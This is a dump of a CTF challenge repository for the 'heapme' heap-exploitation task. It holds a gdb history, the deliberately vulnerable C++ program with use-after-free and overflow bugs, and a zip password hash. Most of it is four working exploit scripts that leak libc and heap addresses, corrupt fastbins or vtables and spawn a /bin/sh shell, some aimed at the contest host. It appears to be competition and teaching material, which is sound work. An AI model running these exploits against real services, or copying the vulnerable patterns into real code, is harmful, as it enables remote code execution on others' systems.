disassemble _ZN11DiskFactory8readDiskEv 12 | b * 13 | b *_ZN11DiskFactory8readDiskEv+144 14 | c 15 | r 16 | c 17 | telescope 0x55555556b690 18 | telescope 0x55555556b680 19 | kill 20 | attach 30751 21 | x/a 055ebe76ed3d0 22 | x/a 0x55ebe76ed3d0 23 | telescope 0x55ebe76ed3d0 24 | telescope 0x55ebe76ed470 25 | telescope 0x55ebe76ed300 26 | kill 27 | attach 35689 28 | telescope 0x55aead067130 29 | telescope 55aead067120 30 | telescope 0x55aead067120 31 | x/a0x55aead067130 32 | x/a0x55aeab96bda8 33 | x/a0x55aeab9692fc 34 | 0x55aeab9692fc0x55aeab9692fc 35 | kill 36 | pgrep 37 | sh pgrep heap 38 | attach 35689 39 | attach 35689 40 | attach 35965 41 | kill 42 | attach 35990 43 | kill 44 | attach 36005 45 | x/a 0x5634da756038 46 | telescope 0x5634da756038 47 | telescope 0x5634da756080 48 | c 49 | bt 50 | disassemble 0x00005634d942857a 51 | x/a 0x5634da756038 52 | x/a 0x5634da756080 53 | x/a 0x5634da756180 54 | x/a 0x5634da756080 + 0x100 55 | x/a 0x5634da756038 - 0x5634da756080 56 | x/a 0x5634da756080 - 0x5634da756038 57 | x/a 0x5634da756080 + 0x48 58 | exit 59 | kill 60 | attach 36073 61 | c 62 | kill 63 | attach 36208 64 | c 65 | x/a $rdx 66 | x/a 0x55576061d0c8 67 | kill 68 | attach 36269 69 | c 70 | x/a $rax 71 | kil 72 | kill 73 | attach 36540 74 | x/a 0x55a59c1fd060 75 | x/10a 0x55a59c1fd060 76 | kill 77 | attach 36671 78 | x/a 0x7f657d7b7b98 79 | c 80 | x/a $rdx 81 | x/a 0x561c855830c8 82 | x/s $rdi 83 | x/a $rdi 84 | p &system 85 | info proc mappings 86 | # 0x7f657d7b7b98 87 | p/a 0x7f657d7b7b98 - 0x7f657d3f3000 88 | x/a 0x7f657d7b7b98 89 | p/a $rax 90 | x/a $rsp+0x50 91 | x/a $rsp+0x30 92 | 0x561ef5869080 - 0x561ef5869780 93 | p/a 0x561ef5869080 - 0x561ef5869780 94 | p/a 0x561ef5869780 - 0x561ef5869080 95 | p/a 0x556953bbb080 + 0x700 96 | p/a 0x555d16468240 - 555d16468080 97 | p/a 0x555d16468240 - 0x555d16468080 98 | kill 99 | attach 37155 100 | c 101 | x/i $pc 102 | b execve 103 | kill 104 | attach 37163 105 | c 106 | kill 107 | attach 37181 108 | c 109 | x/a $rdi 110 | x/s $rdi 111 | x/a $rsi 112 | x/2 $rsi 113 | x/s 0x565266ee9887 114 | x/a $rdx 115 | x/3a $rdx 116 | c 117 | bt 118 | kill 119 | attach 37289 120 | c 121 | d 122 | c 123 | attach 37314 124 | set follow-exec-mode new 125 | set follow-fork-mode child 126 | c 127 | c 128 | kill 129 | attach 37323 130 | c 131 | x/a $rax 132 | c 133 | c 134 | c 135 | kill 136 | attach 37341 137 | c 138 | kill 139 | attach 37375 140 | c 141 | x/a $rax 142 | x/a $rsp+0x30 143 | x/a $rsp+0x50 144 | x/a $rsp+0x70 145 | x/a $rsp+0x30 146 | x/a $rsp+0x70 147 | x/a $rsp+0x70 148 | x/a $rsp+0x70 149 | x/a $rsp+0x70 150 | x/a $rsp+0x70 151 | x/a $rsp+0x30 152 | x/a $rsp+0x50 153 | x/10a $rsp+0x50 154 | x/s 0x563c54e1b226 155 | p/a $rax 156 | 0x563c54e1b226 157 | x/100a $rsp+0x30 158 | x/100a $rsp 159 | f 160 | kill 161 | attach 37486 162 | c 163 | bt 164 | x/i 0x000055c5d456f57a 165 | disassemble 0x000055c5d456f57a 166 | x/10i 0x000055c5d456f57a 167 | x/10i 0x000055c5d456f57a - 1 168 | x/10i 0x000055c5d456f57a - 2 169 | x/a $rsp 170 | x/a $rsp+0x30 171 | x/a $rsp+0x50 172 | x/a $rsp+0x70 173 | x/100a $rsp 174 | kill 175 | attach 37542 176 | c 177 | x/a $rsp 178 | x/a $rsp+0x30 179 | x/a $rsp+0x50 180 | x/a $rsp+0x70 181 | x/100a $rsp 182 | x/10a $rsp+0x30 183 | x/100a $rsp+0x30 184 | x/100a $rsp+0x50 185 | kill 186 | attach 37658 187 | c 188 | x/a $rsp 189 | x/a $rsp+0x30 190 | x/a $rsp+0x50 191 | x/a $rsp+0x70 192 | kill 193 | attach 37756 194 | c 195 | kill 196 | attach 37773 197 | c 198 | x/a $rsp 199 | x/a $rsp+0x30 200 | x/a $rsp+0x40 201 | x/a $rsp+0x70 202 | x/a $rsp+0x70 203 | x/a $rsp+0x70 204 | x/a $rsp+0x70 205 | x/a $rsp+0x70 206 | b execve 207 | c 208 | c 209 | d 210 | b execve 211 | c 212 | d 213 | b execve 214 | attach 37790 215 | b execve 216 | c 217 | x/a $rsi 218 | x/a $rdi 219 | x/s $rdi 220 | x/s $rsi 221 | x/a $rsi 222 | x/a $rdx 223 | x/10a $rdx 224 | x/s 0x7fffd0aebfc1 225 | exit 226 | quit 227 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | # g++ heapme.cpp -o heapme -fstack-protector-all -Wl,-z,relro,-z,now 3 | # g++ heapme.cpp -o heapme # -fstack-protector-all -Wl,-z,relro,-z,now 4 | # g++ heapme.cpp -o heapme -fno-pie -fno-pic # -fstack-protector-all -Wl,-z,relro,-z,now 5 | g++ heapme.cpp -o heapme -fstack-protector -g # -Wl,-z,relro,-z,now 6 | cp heapme ../chall/ 7 | 8 | patch: 9 | patchelf --set-interpreter /root/tools/glibc/x64/ld-2.23.so ./heapme 10 | 11 | clean: 12 | rm -rf heapme 13 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pwn 4 | import clize 5 | 6 | # Double free is way easier but wanted to give a try to the vtable 7 | # https://twitter.com/chaignc/status/958854296833060864?s=20 <= read this 8 | # Warning this is how a one hour written exploit looks like, #shame 9 | 10 | # gdb-peda$ telescope 0x55555556b690 11 | # 0000| 0x55555556b690 --> 0x555555557da8 --> 0x5555555552fc (<_ZN4Disk4readEv>: push rbp) 12 | # 0008| 0x55555556b698 --> 0x55555556b6b0 ("testtest") 13 | # 0016| 0x55555556b6a0 --> 0x0 14 | # 0024| 0x55555556b6a8 --> 0x31 ('1') 15 | # 0032| 0x55555556b6b0 ("testtest") 16 | 17 | def exploit(*, remote=True, host="127.0.0.1", port=4242): 18 | print("Please: socat TCP-LISTEN:8080 openssl-connect:SERVER_HERE:4242,cert=client.pem,cafile=server.crt,verify=0") 19 | # socat -d TCP-LISTEN:1234,reuseaddr,fork openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0 20 | if remote: 21 | p = pwn.remote(host, port) 22 | else: 23 | p = pwn.process("./heapme", env={"LD_PRELOAD":"/root/veille/challenge/ctf/FIC_Hexpresso_2019_quals/pwn/secret_ressources/libc-2.23.so"}) 24 | # p.interactive() 25 | 26 | 27 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 28 | # constraints: 29 | # [rsp+0x70] == NULL 30 | one_gadget_rce = 0xf1147 31 | 32 | print("[+] Fill memory") 33 | for i in range(70, 80): 34 | create_disk(p, i, 32) 35 | print("B") 36 | write_disk(p, i, b"A" * 32) 37 | 38 | create_disk(p, 42, 16) 39 | 40 | print("[+] Fill freelist") 41 | for i in range(70, 80): 42 | delete_disk(p, i) 43 | 44 | print("#" * 100) 45 | for i in range(80, 100): 46 | create_disk(p, i, 16) 47 | 48 | print("Leak " + "#" * 100) 49 | print("=> 3 leak buffer of [5]") 50 | _, heap_leak = read_disk(p, 73) 51 | one_gadget_ptr_offset = heap_leak + 0x700 52 | 53 | print("Leak main_arena ".ljust(100, "#")) 54 | create_disk(p, 50, 0x400) 55 | create_disk(p, 51, 16) 56 | delete_disk(p, 50) 57 | 58 | create_disk(p, 50, 16) 59 | _, main_arena = read_disk(p, 50) 60 | print(f"main_arena = {main_arena:x}") 61 | libc_base = main_arena - 0x3c4b98 62 | print(f"libc_base = {libc_base:x}") 63 | one_gadget_rce += libc_base 64 | print(f"one_gadget_rce = {one_gadget_rce:x}") 65 | 66 | print("Upload one_gadget_rce ".ljust(100, "#")) 67 | create_disk(p, 50, 100) 68 | write_disk(p, 50, pwn.p64(one_gadget_rce)[:6]) 69 | read_disk(p, 50) 70 | 71 | print("Overwrite ".ljust(100, "#")) 72 | print("=> 12 => overwrite [4] Disk") 73 | write_disk(p, 82, pwn.p64(one_gadget_ptr_offset)) 74 | 75 | p.sendline("1") 76 | p.sendline("74") 77 | 78 | p.interactive() 79 | 80 | ###################################################################### 81 | ### Utils ### 82 | ###################################################################### 83 | 84 | def create_disk(p, index, size): 85 | pwn.log.info("create_disk") 86 | p.sendlineafter('Command: ', '0') 87 | p.sendlineafter('Size: ', str(size)) 88 | p.sendlineafter('Index: ', str(index)) 89 | 90 | def read_disk(p, index): 91 | pwn.log.info("read_disk") 92 | p.sendlineafter('Command: ', '1') 93 | p.sendlineafter('Index: ', str(index)) 94 | p.recvuntil("Data: ") 95 | data = p.recvuntil(b"\n#########################################################", drop=True) 96 | print(f"Read Data: {data}") 97 | ptr = data.split(b'\n')[0].ljust(8, b'\x00') 98 | ptr = pwn.u64(ptr) 99 | print(f"ptr = {ptr:x}") 100 | return data, ptr 101 | 102 | def write_disk(p, index, data): 103 | pwn.log.info("write_disk") 104 | p.sendlineafter('Command: ', '2') 105 | p.sendlineafter('Index: ', str(index)) 106 | p.sendlineafter('Data: ', data) 107 | 108 | def delete_disk(p, index): 109 | pwn.log.info("delete_disk") 110 | p.sendlineafter('Command: ', '3') 111 | p.sendlineafter('Index: ', str(index)) 112 | 113 | def exit(p): 114 | p.sendlineafter('Command: ', '4') 115 | 116 | if __name__ == "__main__": 117 | clize.run(exploit) 118 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/exploit.py.sos: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pwn 4 | import clize 5 | 6 | # gdb-peda$ telescope 0x55555556b690 7 | # 0000| 0x55555556b690 --> 0x555555557da8 --> 0x5555555552fc (<_ZN4Disk4readEv>: push rbp) 8 | # 0008| 0x55555556b698 --> 0x55555556b6b0 ("testtest") 9 | # 0016| 0x55555556b6a0 --> 0x0 10 | # 0024| 0x55555556b6a8 --> 0x31 ('1') 11 | # 0032| 0x55555556b6b0 ("testtest") 12 | 13 | def exploit(*, remote=True, host="127.0.0.1", port=4242): 14 | if remote: 15 | p = pwn.remote(host, port) 16 | else: 17 | p = pwn.process("./heapme", env={"LD_PRELOAD":"/root/tools/glibc/x64/libc-2.23.so"}) 18 | 19 | 20 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 21 | # constraints: 22 | # [rsp+0x70] == NULL 23 | one_gadget_rce = 0xf1147 24 | 25 | print("[+] Fill memory") 26 | for i in range(70, 80): 27 | create_disk(p, i, 32) 28 | print("B") 29 | write_disk(p, i, b"A" * 32) 30 | 31 | create_disk(p, 42, 16) 32 | 33 | print("[+] Fill freelist") 34 | for i in range(70, 80): 35 | delete_disk(p, i) 36 | 37 | print("#" * 100) 38 | for i in range(80, 100): 39 | create_disk(p, i, 16) 40 | 41 | print("Leak " + "#" * 100) 42 | print("=> 3 leak buffer of [5]") 43 | _, heap_leak = read_disk(p, 73) 44 | one_gadget_ptr_offset = heap_leak + 0x700 45 | 46 | print("Leak main_arena ".ljust(100, "#")) 47 | create_disk(p, 50, 0x400) 48 | create_disk(p, 51, 16) 49 | delete_disk(p, 50) 50 | 51 | create_disk(p, 50, 16) 52 | _, main_arena = read_disk(p, 50) 53 | print(f"main_arena = {main_arena:x}") 54 | libc_base = main_arena - 0x3c4b98 55 | print(f"libc_base = {libc_base:x}") 56 | one_gadget_rce += libc_base 57 | print(f"one_gadget_rce = {one_gadget_rce:x}") 58 | 59 | print("Upload one_gadget_rce ".ljust(100, "#")) 60 | create_disk(p, 50, 100) 61 | write_disk(p, 50, pwn.p64(one_gadget_rce)[:6]) 62 | read_disk(p, 50) 63 | 64 | print("Overwrite ".ljust(100, "#")) 65 | print("=> 12 => overwrite [4] Disk") 66 | write_disk(p, 82, pwn.p64(one_gadget_ptr_offset)) 67 | raw_input("GDB") 68 | 69 | p.sendline("1") 70 | p.sendline("74") 71 | 72 | p.interactive() 73 | 74 | ###################################################################### 75 | ### Utils ### 76 | ###################################################################### 77 | 78 | def create_disk(p, index, size): 79 | pwn.log.info("create_disk") 80 | p.sendlineafter('Command: ', '0') 81 | p.sendlineafter('Size: ', str(size)) 82 | p.sendlineafter('Index: ', str(index)) 83 | 84 | def read_disk(p, index): 85 | pwn.log.info("read_disk") 86 | p.sendlineafter('Command: ', '1') 87 | p.sendlineafter('Index: ', str(index)) 88 | p.recvuntil("Data: ") 89 | data = p.recvuntil(b"\n#########################################################", drop=True) 90 | print(f"Read Data: {data}") 91 | ptr = data.split(b'\n')[0].ljust(8, b'\x00') 92 | ptr = pwn.u64(ptr) 93 | print(f"ptr = {ptr:x}") 94 | return data, ptr 95 | 96 | def write_disk(p, index, data): 97 | pwn.log.info("write_disk") 98 | p.sendlineafter('Command: ', '2') 99 | p.sendlineafter('Index: ', str(index)) 100 | p.sendlineafter('Data: ', data) 101 | 102 | def delete_disk(p, index): 103 | pwn.log.info("delete_disk") 104 | p.sendlineafter('Command: ', '3') 105 | p.sendlineafter('Index: ', str(index)) 106 | 107 | def exit(p): 108 | p.sendlineafter('Command: ', '4') 109 | 110 | if __name__ == "__main__": 111 | clize.run(exploit) 112 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/heapme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/secret_ressources/heapme -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/heapme.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | class Disk 7 | { 8 | public: 9 | char *buffer; 10 | 11 | public: 12 | Disk(size_t size) { 13 | buffer = new char[size]; 14 | } 15 | ~Disk() { 16 | delete buffer; 17 | } 18 | virtual void read() { 19 | std::cout << "Data: " << buffer << std::endl; 20 | // std::cout << "Ptr: " << this << " : " << (void*) buffer << std::endl; 21 | } 22 | virtual void write() { 23 | std::cout << "Data: "; 24 | std::cin >> buffer; 25 | } 26 | }; 27 | 28 | class DiskFactory 29 | { 30 | private: 31 | Disk *disks[100] = {0}; 32 | 33 | size_t getIndex() { 34 | size_t index = 0; 35 | 36 | do { 37 | std::cout << "Index: "; 38 | std::cin >> index; 39 | std::cout << index << std::endl; 40 | } while (index >= 100); 41 | return index; 42 | } 43 | 44 | public: 45 | void createDisk() { 46 | std::cout << "[+] Create Disk" << std::endl; 47 | std::cout << "Size: "; 48 | size_t size = 0; 49 | std::cin >> size; 50 | disks[getIndex()] = new Disk(size); 51 | } 52 | void readDisk() { 53 | std::cout << "[+] read Disk" << std::endl; 54 | Disk *disk = disks[getIndex()]; 55 | if (disk) 56 | disk->read(); 57 | else 58 | std::cout << "ERROR" << std::endl; 59 | } 60 | void writeDisk() { 61 | std::cout << "[+] write Disk" << std::endl; 62 | Disk *disk = disks[getIndex()]; 63 | if (disk) 64 | disk->write(); 65 | else 66 | std::cout << "ERROR" << std::endl; 67 | } 68 | void deleteDisk() { 69 | std::cout << "[+] delete Disk" << std::endl; 70 | Disk *disk = disks[getIndex()]; 71 | if (disk) 72 | delete disk; 73 | else 74 | std::cout << "ERROR" << std::endl; 75 | } 76 | }; 77 | 78 | class CommandManager 79 | { 80 | private: 81 | DiskFactory disk_factory; 82 | 83 | size_t getCommand() { 84 | size_t index = 0; 85 | std::cout << "Command: "; 86 | std::cin >> index; 87 | return index; 88 | } 89 | void menu() { 90 | std::cout << "#########################################################" << std::endl; 91 | std::cout << "0: Create disk" << std::endl; 92 | std::cout << "1: Read disk" << std::endl; 93 | std::cout << "2: Write disk" << std::endl; 94 | std::cout << "3: Delete disk" << std::endl; 95 | std::cout << "4: Exit" << std::endl; 96 | 97 | } 98 | public: 99 | void loop() { 100 | while (true) { 101 | menu(); 102 | switch (getCommand()) { 103 | case 0: 104 | disk_factory.createDisk(); break; 105 | case 1: 106 | disk_factory.readDisk(); break; 107 | case 2: 108 | disk_factory.writeDisk(); break; 109 | case 3: 110 | disk_factory.deleteDisk(); break; 111 | default: 112 | std::cout << "exit" << std::endl; 113 | exit(0); 114 | } 115 | } 116 | } 117 | }; 118 | 119 | int main() 120 | { 121 | // alarm(10); 122 | std::cout << "Welcome to the final stage of the CaptureTheFIC CTF by HexpressoTeam" << std::endl; 123 | std::cout << "Author: @chaignc" << std::endl; 124 | CommandManager command_manager; 125 | command_manager.loop(); 126 | return 0; 127 | } 128 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/secret_ressources/requirements.txt: -------------------------------------------------------------------------------- 1 | git+https://github.com/Gallopsled/pwntools.git@dev3 2 | clize 3 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/Shiro.md: -------------------------------------------------------------------------------- 1 | [Shiro](https://github.com/Pycatchown/writeUps/blob/master/FIC/step7/wu_step7.md) 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/geluchat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | import time 6 | import os 7 | 8 | context(arch='amd64') 9 | p = 0 10 | libc = 0 11 | LOCAL = False 12 | DEBUG = False 13 | 14 | def wait(until): 15 | buf=p.recvuntil(until) 16 | if(DEBUG): 17 | print buf 18 | return buf 19 | 20 | def start(): 21 | global p,libc 22 | #p = process('./heapme',env={"LD_PRELOAD":"./libc-2.23.so"}) 23 | #p = process('LD_PRELOAD=./libc-2.23.so strace -o out -vf ./heapme',shell=True) 24 | p=process('socat stdio openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0',shell=True) 25 | libc = ELF('./libc-2.23.so') 26 | print wait("d: ") 27 | 28 | def create(idx,size): 29 | p.sendline("0") 30 | wait("ze: ") 31 | p.sendline(str(size)) 32 | wait("ex: ") 33 | p.sendline(str(idx)) 34 | wait("d: ") 35 | 36 | 37 | def read(idx): 38 | p.sendline("1") 39 | wait("ex: ") 40 | p.sendline(str(idx)) 41 | return wait("d: ") 42 | 43 | 44 | def write(idx,content): 45 | p.sendline("2") 46 | wait("ex: ") 47 | p.sendline(str(idx)) 48 | wait("ta: ") 49 | p.sendline(content) 50 | wait("d: ") 51 | 52 | def delete(idx): 53 | p.sendline("3") 54 | wait("ex: ") 55 | p.sendline(str(idx)) 56 | wait("d: ") 57 | 58 | def close(): 59 | p.close() 60 | 61 | 62 | 63 | 64 | DEBUG=False 65 | start() 66 | create(0,0x10) 67 | create(1,0x10) 68 | create(2,0x80) 69 | delete(1) 70 | delete(2) 71 | create(3,0x10) 72 | 73 | a=read(3) 74 | leak=(u64((a.split(': ')[1].split('\n')[0]).ljust(8,'\x00'))) 75 | print hex(leak) 76 | magic=leak-3951528+0xf1147 77 | print(hex(magic)) 78 | 79 | 80 | create(4,0x10) 81 | create(5,0x20) 82 | delete(4) 83 | delete(5) 84 | create(6,0x10) 85 | a=read(6) 86 | leak=(u64((a.split(': ')[1].split('\n')[0]).ljust(8,'\x00'))) 87 | print hex(leak) 88 | magic_ph=leak-0x30 89 | 90 | create(7,0x10) 91 | create(8,0x10) 92 | create(9,0x10) 93 | 94 | write(8,"b"*32+p64(magic_ph)) 95 | print(hex(magic_ph)) 96 | 97 | #wtf ? 98 | write(0,"a"*36+'\x00'+'a'*0x3b+'-s\x00') 99 | write(6,p64(magic)) 100 | 101 | 102 | p.sendline("1") 103 | p.sendline(str(9)) 104 | 105 | p.interactive() 106 | 107 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/laxa.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | # https://www.synacktiv.com/posts/challenges/fic2020-prequals-ctf-write-up.html 6 | # socat TCP-LISTEN:8080,fork,reuseaddr openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0 7 | 8 | ### 9 | 10 | if len(sys.argv) > 1: 11 | DEBUG = False 12 | libc = ELF('libc-2.23.so') 13 | else: 14 | DEBUG = True 15 | libc = ELF('libc-2.23.so') 16 | 17 | b = ELF('heapme') 18 | context.log_level = 'info' 19 | context.arch = 'amd64' 20 | 21 | ### 22 | 23 | if DEBUG: 24 | r = process('./heapme', aslr=True, env={'LD_PRELOAD':'/home/laxa/Documents/Challenges/CTF/hexpresso2k19/libc-2.23.so'}) 25 | else: 26 | r = process('socat stdio openssl-connect:ctf.hexpresso.fr:4242,cert=client.pem,cafile=server.crt,verify=0'.split()) 27 | 28 | GDB = False 29 | if DEBUG and GDB: 30 | bps = [] 31 | base = 0x0000555555554000 32 | params = '' 33 | for bp in bps: 34 | params += 'b *{}\n'.format(hex(bp + base)) 35 | gdb.attach(r, params) 36 | 37 | def menu(): 38 | global r 39 | return r.recvuntil('4: Exit\n') 40 | 41 | def create_disk(size, index): 42 | global r 43 | r.sendline('0') 44 | r.sendlineafter('[+] Create Disk\n', str(size)) 45 | r.sendline(str(index)) 46 | return menu() 47 | 48 | def write_disk(index, data): 49 | global r 50 | r.sendline('2') 51 | r.sendlineafter('write Disk\n', str(index)) 52 | r.sendline(data) 53 | return menu() 54 | 55 | def read_disk(index): 56 | global r 57 | r.sendline('1') 58 | r.sendlineafter('read Disk\n', str(index)) 59 | r.recvuntil('Data: ') 60 | data = menu() 61 | return data.split('\n')[0] 62 | 63 | def delete_disk(index): 64 | global r 65 | r.sendline('3') 66 | r.sendlineafter('delete Disk\n', str(index)) 67 | return menu() 68 | 69 | menu() 70 | create_disk(256, 0) 71 | create_disk(256, 15) 72 | delete_disk(0) 73 | create_disk(256, 0) 74 | 75 | data = read_disk(0) 76 | leak = u64(data.ljust(8, '\x00')) 77 | 78 | libc_base = leak - 0x3c4b78 79 | log.info('leak: %#x' % leak) 80 | log.info('libcbase: %#x' % libc_base) 81 | 82 | # modified fastbin_dup_into_stack 83 | # Goal is to get an alloc into libc BSS 84 | create_disk(48, 2) 85 | create_disk(48, 3) 86 | delete_disk(2) 87 | delete_disk(3) 88 | 89 | # this offset points to a p64(0x40) value inside libc.bss where we are going 90 | # to allocate a fastbin of size 0x30 91 | offset = 0x98f 92 | 93 | # We perform a modified version of fastbin_dup_into_stack 94 | # we have two 0x30 chunks in the free_list, we overflow the one pointing to the first one 95 | # and replace the pointer to point to leak - offset - 0x8 which is will be considered 96 | # valid by malloc. We then do 2 allocations, the second one will point inside libc.bss 97 | # We can therefore craft a vtable there and overflow the heap as we please using our vtable 98 | p = 'A' * 256 + p64(0) + p64(0x21) + p64(0) * 2 + p64(0) + p64(0x41) + 'B' * 48 99 | p += p64(0) + p64(0x21) + p64(0) * 2 + p64(0) + p64(0x41) + p64(leak - offset - 0x8) 100 | write_disk(15, p) 101 | 102 | create_disk(48, 10) 103 | log.info('libc.bss: %#x' % (leak - offset - 0x8)) 104 | create_disk(48, 11) # points into libc.bss 105 | 106 | # This is the magic gadget we use 107 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 108 | # constraints: 109 | # [rsp+0x70] == NULL 110 | # [rsp+0x70] contains the index [1] of the DiskFactory, therefore, we dont use this index 111 | # to satisfy the condition 112 | write_disk(11, p64(libc_base + 0xf1147)) # magic gadget 113 | 114 | # Overflowing the heap into disk index [15] with a vtable->read pointing to magic gadget 115 | vtable = leak - offset - 0x8 + 0x10 116 | p = 'A' * 256 + p64(0x110) + p64(0x21) + p64(vtable) 117 | write_disk(0, p) 118 | 119 | # Triggering the exploit 120 | r.sendline('1') 121 | r.sendline('15') 122 | r.recvuntil('read Disk\n') 123 | r.recvline() 124 | 125 | r.interactive() 126 | r.close() 127 | 128 | ''' 129 | https://ctf.hexpresso.fr/756875e19d16013c5072b2b6e17804f7 130 | 131 | YOU DID IT !!! 132 | Here is the LAST flag. 133 | We hope you enjoyed it ;) 134 | Send us an email here : 5c141765db003a82e9a9978566b6d78f@hexpresso.fr 135 | ''' 136 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/solutions/uaf.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import telnetlib 3 | 4 | def read_until(s, text): 5 | buffer = b'' 6 | while len(buffer) < len(text): 7 | buffer += s.recv(1) 8 | while buffer[-len(text):] != text: 9 | buffer += s.recv(1) 10 | return buffer[:] 11 | 12 | def create_entry(s, size, idx): 13 | s.send('0\n'.encode()) 14 | p = read_until(s, 'Size: '.encode()) 15 | s.send((str(size) + "\n").encode()) 16 | p = read_until(s, 'Index: '.encode()) 17 | s.send((str(idx) + "\n").encode()) 18 | return recv_menu(s) 19 | 20 | def read_entry(s, idx): 21 | s.send('1\n'.encode()) 22 | p = read_until(s, 'Index: '.encode()) 23 | s.send((str(idx) + "\n").encode()) 24 | p = read_until(s, 'Data: '.encode()) 25 | p = read_until(s, '\n'.encode()) 26 | return recv_menu(s), p 27 | 28 | def write_entry(s, idx, data): 29 | s.send('2\n'.encode()) 30 | p = read_until(s, 'Index: '.encode()) 31 | s.send((str(idx) + "\n").encode()) 32 | p = read_until(s, 'Data: '.encode()) 33 | s.send(data + "\n".encode()) 34 | return recv_menu(s) 35 | 36 | def delete_entry(s, idx): 37 | s.send('3\n'.encode()) 38 | p = read_until(s, 'Index: '.encode()) 39 | s.send((str(idx) + "\n").encode()) 40 | return recv_menu(s) 41 | 42 | def recv_menu(s): 43 | res = read_until(s, 'Command: '.encode()) 44 | return res 45 | 46 | #context.log_level = "debug" 47 | 48 | s = socket.socket() 49 | s.connect(("localhost", 4141)) 50 | recv_menu(s) 51 | create_entry(s, 136, 20) 52 | create_entry(s, 16, 21) 53 | delete_entry(s, 20) 54 | create_entry(s, 136, 22) 55 | _, leak = read_entry(s, 22) 56 | leak = leak[:-1] 57 | 58 | leak = int.from_bytes(leak, byteorder='little') 59 | magic_gadget = leak - 2964017 60 | 61 | print('leak is: {:x}'.format(leak)) 62 | print('magic gadget is: {:x}'.format(magic_gadget)) 63 | 64 | 65 | create_entry(s, 16, 23) 66 | create_entry(s, 16, 24) 67 | delete_entry(s, 23) 68 | delete_entry(s, 24) 69 | create_entry(s, 16, 25) 70 | _, leak_heap = read_entry(s, 25) 71 | 72 | leak_heap = leak_heap[:-1] 73 | 74 | leak_heap = int.from_bytes(leak_heap, byteorder='little') 75 | print('leak_heap is: {:x}'.format(leak_heap)) 76 | 77 | create_entry(s, 16, 26) 78 | create_entry(s, 16, 27) 79 | read_entry(s, 26) 80 | read_entry(s, 27) 81 | write_entry(s, 26, 'A'.encode() * 128 + (magic_gadget).to_bytes(8, byteorder='little')) 82 | write_entry(s, 26, 'A'.encode() * 96 + (leak_heap + 176).to_bytes(8, byteorder='little')) 83 | 84 | s.send('1\n'.encode()) 85 | p = read_until(s, 'Index: '.encode()) 86 | s.send((str(27) + "\n").encode()) 87 | a = s.recv(100) 88 | 89 | print('a', a) 90 | t = telnetlib.Telnet() 91 | t.sock = s 92 | t.interact() 93 | 94 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/8e23eca76cbfdb90988a5b92577c147c.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/8e23eca76cbfdb90988a5b92577c147c.zip -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/client.pem: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/client.pem -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/doc.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nongiach/ctf_challs/3aee9c2d9d85ea3508849613c96ae1c8e865eaec/CaptureTheFIC2020_Quals/pwn/test_player/doc.txt -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/hash.txt: -------------------------------------------------------------------------------- 1 | 8e23eca76cbfdb90988a5b92577c147c.zip:$pkzip2$3*2*1*0*8*24*9312*7389*5cbd04e91d1fc533d53e65a651eba18ae32e3367e3ea4a10c775d3921153a6615035b56b*1*0*8*24*1001*af37*dc995002bd4806c7f16a9c417a150821bd77143897e6f154bb9552868dfe9242cf545315*2*0*90*a0*672aa752*0*41*8*90*672a*91d8*6e6743f31ebc68852fed35d9247fd7cc2b0c9925e825c428a908fecd0f779b349b6827c48b97bb8e10c614c9930445797204b4e26fae93e99a37b81c0f19acd934e1221f0a2ace7152a4c69192e1f1fac3d0750ecf825cf8f766aaf1d082ebc2a4095f21e8a11a89b7b0cc4e33209447c5bdd0a5c83e54c459e42edacb96f759cc40cfdf1eb4f2e04fc12a59dc3e8ef3*$/pkzip2$::8e23eca76cbfdb90988a5b92577c147c.zip:doc.txt, heapme, libc-2.23.so:8e23eca76cbfdb90988a5b92577c147c.zip 2 | -------------------------------------------------------------------------------- /CaptureTheFIC2020_Quals/pwn/test_player/heapme: -------------------------------------------------------------------------------- 